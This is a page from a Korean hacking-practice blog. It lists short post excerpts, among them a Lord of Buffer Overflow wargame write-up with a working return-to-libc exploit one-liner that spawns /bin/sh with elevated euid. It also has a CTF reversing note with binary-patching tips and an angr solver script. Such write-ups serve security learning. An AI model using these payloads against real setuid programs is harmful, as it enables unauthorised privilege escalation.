Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
Tags
- 도메인 https
- openctf
- CODEGATE2018
- node.js
- gogs
- xlsx
- NGINX
- pwnable
- Git
- Branch
- https
- pwntools
- module
- node
- gogs private git
- 노드 엑셀
- 코드게이트2017
- doorlock
- Codegate
- lob
- BLUETOOTH
- CVE
- 코드게이트
- shellcraft
- 코드게이트 주니어
- npm
- https설정
- Hacking
- codegate2017
- blueborne
Archives
- Today
- Total
고졸백수해킹일기
defcon2017 pegem
보호되어 있는 글입니다.
Reversing
2018. 3. 3. 03:46
darkknight->bugbear
../bugbear `python -c 'print "\x90"*44+"\xe0\x8a\x05\x40"+"BBBB"+"\x1a\xfc\xff\xbf"+"/bin/sh"'`;RTL을 이용하여 exploit해주면 된다.system 주소는 main에 bp를 걸어주고 p system을 쳐주면 구할 수 있다./bin/sh의 주소는 esp+8에 넣어주면 된다. uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) groups=512(darkknight)bash$ my-passeuid = 513new divide
Wargame/lob
2018. 2. 27. 15:24
codegate2017 angrybird
바이너리를 실행하면 실행이 되지 않는다. .text:0000000000400778 cmp eax, 1요래 바꿔주고 > 안그러면 아래분기 jz에서 _exit로 뛰어버려 꺼진다. 아랫부분도 코드패치를 알아서 쓱싹쓱싹 해주면 된다. exit하는 부분이라 nop로 분기처리해도 되고 조건을 적당히 맞춰줘도 된다. 나머지는 앵거로 쓱.싹.해주면 된다. import angrp = angr.Project("./angrybird", load_options={'auto_load_libs':False})path_group = p.factory.path_group(threads=2)path_group.explore(find=0x404fc1)print path_group.found[0].state.posix.dumps(0) f..
Reversing
2018. 2. 23. 04:03